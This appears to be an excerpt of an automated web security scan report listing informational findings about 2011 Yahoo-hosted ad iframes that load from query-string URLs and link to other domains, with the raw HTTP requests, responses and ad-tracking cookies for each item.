Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2560

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.img.120x60/1315313297**;" />
...[SNIP]...

15.24. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2|3D5D|0|0|%2a|t;234260563;0-0;0;58130593;31-1|1;39902686|39920473|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3|ed=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/TR_Bullish Bar_120x60_s.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2510

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/?yhdata=ycg=&yyob=&zip=,&ybt=&" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.img.120x60/1315313297**;?yhdata=&ycg=&yyob=&zip=,&ybt=&" />
...[SNIP]...

15.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2514

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/?yhdata=ycg=&yyob=&zip=,&ybt=&" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.img.120x60/1315313288**;?yhdata=&ycg=&yyob=&zip=,&ybt=&" />
...[SNIP]...

15.27. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.790.iframe.120x60/yhdata*ycg=|yyob=|zip=,|ybt=||**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs=xss" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60 ShinyNL.gif" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

15.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=|yyob=|zip=,|ybt=||**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

15.29. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /iframe3?XKUDAKjdGABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAAB7Z0aGlD8AAOwCYJrhPwAAAAAAAAAAAADsAmCa4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkoZaPCvuuCiHSoGGlzAQsR4Xln-gZOQV-mtGzAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1aqg52%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3DzdSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D2535976306%26cb%3D1315313288506222%26i%3D140509%26r%3D0,79b28cc4-d886-11e0-bbc7-78e7d161369c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&ad_type=iframe&ad_size=300x100&site=140509&section_code=14485997&cb=1315313288506222&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1aqg52/M=787833.14485997.14323832.8514476/D=sports/S=25664825:MIP2/_ylt=Amg2OFI6cJlUlIgmD62T3F05nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=zdSRQtBDRmU-/J=1315313288506222/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=6284797/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!
$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!%=3f<!!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR.4M6EqoyOxB!!w[/!79C86pkAJ; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!%L:B!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<!=3p8(M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb%>oc=M5Jkn/>M1M)lss@; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!(=3f<(!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:48:15 GMT
Set-Cookie: vuday1=@n$r!BKZI(BgvR04M6EqoyOxB!!w[/!79C8EwSZ(; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
